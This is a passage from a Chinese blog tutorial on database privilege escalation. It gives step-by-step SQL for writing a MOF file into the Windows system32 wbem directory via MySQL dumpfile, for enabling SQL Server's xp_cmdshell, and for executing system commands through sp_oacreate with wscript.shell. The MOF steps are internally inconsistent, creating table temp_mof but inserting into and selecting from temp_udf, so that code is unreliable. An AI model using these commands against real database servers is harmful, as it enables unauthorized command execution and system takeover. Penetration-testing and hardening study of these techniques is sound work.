<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">CREATE TABLE temp_mof (mof blob);<br></code></pre></td></tr></table></figure>

<p>2、将二进制数据插入到表格中</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">INSERT into temp_udf values (CONVERT($binaryCode,CHAR));<br></code></pre></td></tr></table></figure>

<p>如何将我们的文件导出成二进制问价呢？</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">select hex(load_file(&#x27;C:/mof.dll&#x27;)) into dumpfile &#x27;c:/mof.txt&#x27;<br></code></pre></td></tr></table></figure>

<p>3、导出到目标目录下</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">SELECT udf FROM temp_udf INTO DUMPFILE &quot;c:/windows/system32/wbem/mof/wanli.mof&quot;<br></code></pre></td></tr></table></figure>

<p>4、等待片刻后提权成功</p>
<h2 id="SQL-Server-提权"><a href="#SQL-Server-提权" class="headerlink" title="SQL Server 提权"></a>SQL Server 提权</h2><h3 id="SQL-Server介绍"><a href="#SQL-Server介绍" class="headerlink" title="SQL Server介绍"></a>SQL Server介绍</h3><p>SQL Server 是Microsoft 公司推出的关系型数据库管理系统。具有使用方便可伸缩性好与相关软件集成程度高等优点，可跨越从运行Microsoft Windows 98 的膝上型电脑到运行Microsoft Windows 2012 的大型多处理器的服务器等多种平台使用。</p>
<h3 id="SQL-Server安装"><a href="#SQL-Server安装" class="headerlink" title="SQL Server安装"></a>SQL Server安装</h3><p>1、sqlserver需要 framework支持先安装这个</p>
<p><img src="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061648363.png" srcset="/img/loading.gif" lazyload alt="img"><br>2、选择sqlserver的安装包进行安装</p>
<p><img src="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061648419.png" srcset="/img/loading.gif" lazyload alt="img"><br>3、运行iso文件弹出安装界面，选择安装全新的sqlserver</p>
<p><img src="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061648401.png" srcset="/img/loading.gif" lazyload alt="img">4、一直点击下一步进行安装，全部勾选选择安装</p>
<p><img src="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061648461.png" srcset="/img/loading.gif" lazyload alt="img"><br>4、选择服务启动类型和账户名</p>
<p><img src="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061648451.png" srcset="/img/loading.gif" lazyload alt="img"><br>5、添加sa账户的密码和执行管理员</p>
<p><img src="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061648508.png" srcset="/img/loading.gif" lazyload alt="img"><br>6、一直点击下一步知道安装页面</p>
<p><img src="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061648724.png" srcset="/img/loading.gif" lazyload alt="img"><br>7、安装完成后连接sqlserver服务端</p>
<p><img src="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061648793.png" srcset="/img/loading.gif" lazyload alt="img"><br>8、完成后如下</p>
<p>SQL Server提权原理</p>
<h3 id="利用条件"><a href="#利用条件" class="headerlink" title="利用条件"></a>利用条件</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs plain">1、任何版本的Sql Server都可以对xp_cmdshell 进行利用；<br>2 、SQL Server数据库没有被降权；<br>3、 sa用户或其他具有dba权限的账户。<br></code></pre></td></tr></table></figure>

<h3 id="xp-cmdshell提权"><a href="#xp-cmdshell提权" class="headerlink" title="xp_cmdshell提权"></a>xp_cmdshell提权</h3><p>xp_cmdshell可以执行系统命令，该组件默认是关闭的，因此需要把它打开。xp_cmdshell默认在mssql2000中是开启的，在mssql2005之后的版本中则默认禁止。如果用户拥有管理员sa权限则可以用sp_configure重新开启它。</p>
<p>1、获取xp_cmdshell的状态如果为1就是有该组件</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">select count(*) from master.dbo.sysobjects where xtype=&#x27;x&#x27; and name=&#x27;xp_cmdshell&#x27;<br></code></pre></td></tr></table></figure>

<p><img src="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061648790.png" srcset="/img/loading.gif" lazyload alt="img"><br>2、开启xp_cmdshell组件</p>
<p>开启：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">EXEC sp_configure &#x27;show advanced options&#x27;, 1;RECONFIGURE;EXEC sp_configure &#x27;xp_cmdshell&#x27;, 1;RECONFIGURE;<br></code></pre></td></tr></table></figure>

<p>关闭：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">EXEC sp_configure &#x27;show advanced options&#x27;, 1;RECONFIGURE;EXEC sp_configure &#x27;xp_cmdshell&#x27;, 0;RECONFIGURE;<br></code></pre></td></tr></table></figure>

<p><img src="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061648855.png" srcset="/img/loading.gif" lazyload alt="img">3、执行命令</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">exec master..xp_cmdshell &#x27;ipconfig&#x27;<br></code></pre></td></tr></table></figure>

<p><img src="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061648883.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<h3 id="sp-oacreate-sp-oamethod（dba权限）"><a href="#sp-oacreate-sp-oamethod（dba权限）" class="headerlink" title="sp_oacreate+sp_oamethod（dba权限）"></a>sp_oacreate+sp_oamethod（dba权限）</h3><p>在xp_cmdshell被删除或不能利用是可以考虑利用sp_oacreate，利用前提需要sqlserver sysadmin账户服务器权限为system（sqlserver2019默认被降权为mssql）。sp_oacreate 是一个存储过程，可以删除、复制、移动文件。还能配合 sp_oamethod 来写文件执行系统命令</p>
<p>1、判断sp_oacreate是否存在，返回1证明存在sp_oacreate</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">select count(*) from master.dbo.sysobjects where xtype=&#x27;x&#x27; and name=&#x27;SP_OACREATE&#x27;<br></code></pre></td></tr></table></figure>

<p><img src="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061648005.png" srcset="/img/loading.gif" lazyload alt="img"><br>2、开启相关的配置</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs plain">exec sp_configure &#x27;show advanced options&#x27;,1;reconfigure;<br>exec sp_configure &#x27;ole automation procedures&#x27;,1;reconfigure;<br></code></pre></td></tr></table></figure>

<p><img src="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061648086.png" srcset="/img/loading.gif" lazyload alt="img"><br>3、直接执行命令成功</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs plain">declare @shell int,@exec int,@text int,@str varchar(8000)<br>exec sp_oacreate &#x27;wscript.shell&#x27;,@shell output<br>exec sp_oamethod @shell,&#x27;exec&#x27;,@exec output,&#x27;C:\\Windows\\System32\\cmd.exe /c whoami&#x27;<br>exec sp_oamethod @exec, &#x27;StdOut&#x27;, @text out<br>exec sp_oamethod @text, &#x27;readall&#x27;, @str out<br>select @str;<br></code></pre></td></tr></table></figure>

<p><img src="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061648130.png" srcset="/img/loading.gif" lazyload alt="img"></p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>数据库提权</div>
      <div>http://example.com/2025/01/06/数据库提权/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>John Doe</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2025年1月6日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-cc-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2025/01/06/%E5%9F%9F%E6%8E%A7%E5%AE%89%E5%85%A8%E4%B8%8E%E8%B7%A8%E5%9F%9F%E6%94%BB%E5%87%BB/" title="域控安全与跨域攻击">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">域控安全与跨域攻击</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2025/01/06/%E5%BA%94%E6%80%A5%E5%93%8D%E5%BA%94%E7%AC%94%E8%AE%B0/" title="应急响应笔记">
                        <span class="hidden-mobile">应急响应笔记</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/5.0.0/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
